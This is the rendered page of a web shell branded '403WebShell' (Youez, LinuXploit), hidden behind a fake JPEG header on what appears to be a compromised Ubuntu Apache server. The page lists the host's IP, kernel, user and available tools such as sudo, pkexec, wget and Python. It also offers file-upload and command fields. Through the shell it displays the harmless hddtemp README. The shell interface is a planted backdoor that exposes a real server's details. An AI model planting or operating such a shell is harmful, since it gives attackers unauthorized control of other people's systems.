????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.217
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/hddtemp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/hddtemp/README
DESCRIPTION
===========
hddtemp will show you the hard drive temperature if the hard drive can
(modern drives support this feature).


COPYRIGHT
=========
This software is distributed under the GPL license.
Please see COPYING file.


INSTALLATION
============
Run ./configure (see --help for options), then just type 'make' and don't forget
to get the last hddtemp.db file on the site :

$ wget http://www.guzu.net/linux/hddtemp.db

By default, the hddtemp.db will we searched in /usr/share/misc directory but
you can change this at compilation time with the --with-db-path option:

$ ./configure --with-db-path=/etc/hddtemp.db



INFORMATION
===========
hddtemp accesses to the SATA disks via ATA pass-through commands (defined in 
T10/04-262r7). Only kernel >= 2.6.16 have this support.

In daemon mode, hddtemp doesn't allow too much query at a time. If the interval
between two query is inferior to 1 minute, hddtemp will give the previous value
(hddtemp query the disk for each connection, if the period is superior to 1
minute).
After starting hddtemp in daemon mode, you can test it with a simple telnet
or netcat:

$ telnet localhost 7634
or
$ netcat localhost 7634

(note: sometimes the netcat command is called nc).

If you know that your drive has a temperature sensor and is reported to be
unsupported tell me which model and which manufacturer it is, and/or just
add a new entry in hddtemp.db. Each line of hddtemp.db is either a commentary,
a blank line or a line containing:
 - a regular expression that allow hddtemp to recognize a drive or a set of drives
   from its model name or from a generic model name,
 - a value (ATTRIBUTE_ID from S.M.A.R.T.),
 - a description.

The separator option allows to specify a separator in the case the drive's name
contains the default separator. Be carefull not to use '?' or '*' which could
exists in the reply of hddtemp.


CONTACT
=======
Emmanuel Varagnat: hddtemp@guzu.net

http://www.guzu.net

Youez - 2016 - github.com/yon3zu
LinuXploit